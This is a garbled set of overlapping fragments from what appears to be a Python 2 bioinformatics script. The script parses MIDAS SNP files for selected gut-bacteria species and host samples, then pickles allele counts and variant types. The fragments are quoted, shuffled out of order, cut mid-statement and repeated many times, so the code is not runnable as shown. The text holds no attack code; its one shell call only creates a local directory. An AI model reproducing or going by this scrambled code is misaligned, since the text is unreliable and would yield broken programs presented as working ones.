allele count allele_counts_map = defaultdict(dict) # Map: site", "'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577),", "depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map =", "'ERR3406235'] # =========================================================================== # Loads allele counts for specific samples at specific sites", "'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001',", "# desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for", "'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257',", "desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\")", "numpy import os, sys # Desired samples and sites # sites are given", "information about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name", "'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], 
\\ 'Bacteroides_fragilis_54507',", "in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load", "allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict,", "as np_random, randint import random from collections import defaultdict import pickle import bz2", "Alternate version without gene names desired_sites_no_gene = [(contig, location) for contig, location, gene_id", "location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499',", "# desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\", "gene_name = info_items[2] variant_type = info_items[3] polarization = 'R' # note R was", "alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() #", "location = long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene: continue", "import random from collections import defaultdict import pickle import bz2 import numpy import", "info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene:", "where sites are provided as (contig, location, gene_id) tuples # TODO: move to", "over sites in annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0:", "samples[idx] sample_site_allele_dict[sample][(contig, location)] = 
(ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information", "= config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) #", "temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import choice, random", "-> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file =", "= info_items[2] variant_type = info_items[3] polarization = 'R' # note R was assigned", "# Load a few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory", "if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items", "num_sites_processed += 1 items = line.split() # Load information about site info_items =", "variant_type # Store alt and depth counts at this site for all desired", "# note R was assigned indiscriminately pvalue = float(info_items[5]) # Only look at", "set of given QP pairs at given sites from utils import sample_utils as", "variant_type_map = {} num_sites_processed = 0 # Loop over sites in annotated_snps.txt file", "the host desired_samples = [] for subject in subjects: desired_samples += subject_sample_map[subject].keys() #", "= items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type =", "Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== #", "= \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for polarization purposes) population_freqs", "population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS 
output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\"", "sites are given as gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites", "Map: sample -> site (contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict)", "Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs", "# inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L),", "desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close()", "location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization = 'R' #", "depth = [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)]", "specific sites # where sites are provided as (contig, location, gene_id) tuples #", "pickle import bz2 import numpy import os, sys # Desired samples and sites", "(contig, location, gene_id) tuples # TODO: move to parse_midas_data later # =========================================================================== def", "directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for polarization", "freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS", "gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) #", "desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene = [(contig, location) for", "desired samples for idx in desired_sample_idxs: alt, 
depth = [float(num) for num in", "sites from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils,", "=========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene", "= items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # =====================================================================", "# where sites are provided as (contig, location, gene_id) tuples # TODO: move", "(['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'],", "import pickle import bz2 import numpy import os, sys # Desired samples and", "lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs =", "depth counts at this site for all desired samples for idx in desired_sample_idxs:", "('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples", "('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', 
[('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] #", "idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele,", "'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # ===========================================================================", "as np from numpy.random import choice, random as np_random, randint import random from", "\\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\", "# Load information about site info_items = items[0].split(\"|\") contig = info_items[0] location =", "site (contig, location, gene_id) -> variant type variant_type_map = {} num_sites_processed = 0", "config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) # Store", "num_sites_processed = 0 # Loop over sites in annotated_snps.txt file for line in", "num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items =", "'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for specific samples at specific", "output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') 
# ===================================================================== # Process allele information", "things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory pdir", "samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() #", "in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id,", "samples within the host desired_samples = [] for subject in subjects: desired_samples +=", "= [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] =", "count allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id) -> variant type", "specific samples at specific sites # where sites are provided as (contig, location,", "processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load information about", "sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map),", "inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\", "as (contig, location, gene_id) tuples # TODO: move to parse_midas_data later # ===========================================================================", "# ===================================================================== # Process allele information # ===================================================================== # sample -> site ->", "(contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map: site (contig,", "Open post-processed MIDAS output snp_file = 
bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists", "[] for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired", "snps_dir, 'r') # Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples", "note R was assigned indiscriminately pvalue = float(info_items[5]) # Only look at sites", "num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close()", "sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample", "bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process allele information # ===================================================================== #", "information about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele", "line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed", "tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614',", "desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for specific", "5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]),", "desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', 
\\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]),", "Load a few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir", "Reformat sites desired_sites = [] for gene_id, contig, location in sites: desired_sites.append((contig, location,", "===================================================================== # Process allele information # ===================================================================== # sample -> site -> (ref", "continue # Store variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt", "gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955',", "in annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites", "allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map() # Set", "9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]),", "alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # ===================================================================== # Open post-processed", "= [] for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites", "(config.data_directory, species_name) # Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name,", "[('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283',", "# Reformat sites desired_sites = [] for gene_id, contig, location in sites: 
desired_sites.append((contig,", "sites desired_sites = [] for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id))", "# (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661',", "allele counts for specific samples at specific sites # where sites are provided", "(for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output", "# Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir, ('_').join(subjects), species), 'wb'))", "# ===================================================================== # sample -> site -> (ref allele, alt allele) sample_site_allele_dict =", "snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs", "\\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\", "Only look at sites of interest if (contig, location, gene_name) not in desired_sites:", "interest if (contig, location, gene_name) not in desired_sites: continue # Store variant type", "version without gene names desired_sites_no_gene = [(contig, location) for contig, location, gene_id in", "\\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\", 
"substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import", "snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for polarization purposes)", "\"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for polarization purposes) population_freqs =", "numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id) -> allele count allele_counts_map", "= ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for specific samples", "\\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960),", "# ===================================================================== # Process annotated_snps information # ===================================================================== # Open post-processed MIDAS output", "as gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\", "type variant_type_map = {} num_sites_processed = 0 # Loop over sites in annotated_snps.txt", "import numpy as np from numpy.random import choice, random as np_random, randint import", "info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if", "annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\"", "desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir, ('_').join(subjects), 
species),", "a few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir =", "float(info_items[5]) # Only look at sites of interest if (contig, location, gene_name) not", "gene_diversity_utils import numpy as np from numpy.random import choice, random as np_random, randint", "annotated_snps information # ===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" %", "sites # where sites are provided as (contig, location, gene_id) tuples # TODO:", "<gh_stars>0 # Script to pickle very specific information (allele identity and counts) #", "Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open", "line.split() # Load information about site info_items = items[0].split(\"|\") contig = info_items[0] location", "# Store these two dicts for each host-species pair for subjects, species, sites", "pair for subjects, species, sites in desired_host_species_sites: # Get all samples within the", "= variant_type # Store alt and depth counts at this site for all", "desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id) -> allele", "pdir) # Store these two dicts for each host-species pair for subjects, species,", "desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file:", "alt and depth counts at this site for all desired samples for idx", "ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir)", "= numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() # Load information about", "% pdir) # Store these two dicts for each host-species pair for subjects,", "# SNPs directory 
snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs", "(ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\"", "desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store", "choice, random as np_random, randint import random from collections import defaultdict import pickle", "'r') # Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples =", "import defaultdict import pickle import bz2 import numpy import os, sys # Desired", "info_items[2] variant_type = info_items[3] polarization = 'R' # note R was assigned indiscriminately", "124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]),", "# Map: site (contig, location, gene_id) -> variant type variant_type_map = {} num_sites_processed", "= info_items[3] polarization = 'R' # note R was assigned indiscriminately pvalue =", "to pickle very specific information (allele identity and counts) # for small set", "alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir,", "import numpy import os, sys # Desired samples and sites # sites are", "[('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96',", "'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815',", "utils import 
sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import", "sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load information", "Loop over sites in annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and", "info_items[2] if (contig, location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele", "desired_samples = [] for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites", "for idx in desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample", "===================================================================== # Process annotated_snps information # ===================================================================== # Open post-processed MIDAS output snp_file", "look at sites of interest if (contig, location, gene_name) not in desired_sites: continue", "desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir, ('_').join(subjects),", "and sites # sites are given as gene_id, contig, location tuples # inconsistent", "\\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\", "variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and depth counts", "(['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'],", "desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for", "names desired_sites_no_gene = [(contig, location) 
for contig, location, gene_id in desired_sites] # SNPs", "in desired_host_species_sites: # Get all samples within the host desired_samples = [] for", "sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items =", "= bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs =", "idx in desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample =", "and depth counts at this site for all desired samples for idx in", "polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file", "su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" %", "def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene =", "pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s'", "given as gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'],", "variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle", "(contig, location, gene_name) not in desired_sites: continue # Store variant type variant_type_map[(contig, location,", "subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id, contig,", "= info_items[2] if (contig, location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs:", "'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', 
\\ [('1121115.4.peg.32', 'AXVN01000001',", "variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and depth counts at this", "# Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get", "gene_id) -> variant type variant_type_map = {} num_sites_processed = 0 # Loop over", "(num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load information about site info_items", "for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = []", "[('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32',", "snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import choice, random as", "long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization = 'R' # note R", "Get all samples within the host desired_samples = [] for subject in subjects:", "given QP pairs at given sites from utils import sample_utils as su, parse_midas_data,", "np from numpy.random import choice, random as np_random, randint import random from collections", "samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id)", "post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of", "in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in", "config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import choice,", "desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = 
line.split() # Load", "sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process", "gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few", "variant_type = info_items[3] polarization = 'R' # note R was assigned indiscriminately pvalue", "contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict,", "= list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample in samples:", "# for small set of given QP pairs at given sites from utils", "[(contig, location) for contig, location, gene_id in desired_sites] # SNPs directory snps_dir =", "('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele", "= 'R' # note R was assigned indiscriminately pvalue = float(info_items[5]) # Only", "# Desired samples and sites # sites are given as gene_id, contig, location", "gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id)", "= defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items =", "= numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id) -> allele count", "5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925),", "gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, 
species_name) #", "0 # Loop over sites in annotated_snps.txt file for line in snp_file: if", "1 items = line.split() # Load information about site info_items = items[0].split(\"|\") contig", "sample -> site (contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict) #", "for contig, location, gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" %", "for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts", "parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without", "in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed +=", "desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population", "allele information # ===================================================================== # sample -> site -> (ref allele, alt allele)", "desired_sites = [] for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) #", "location, gene_name) not in desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)]", "in desired_samples: if sample in 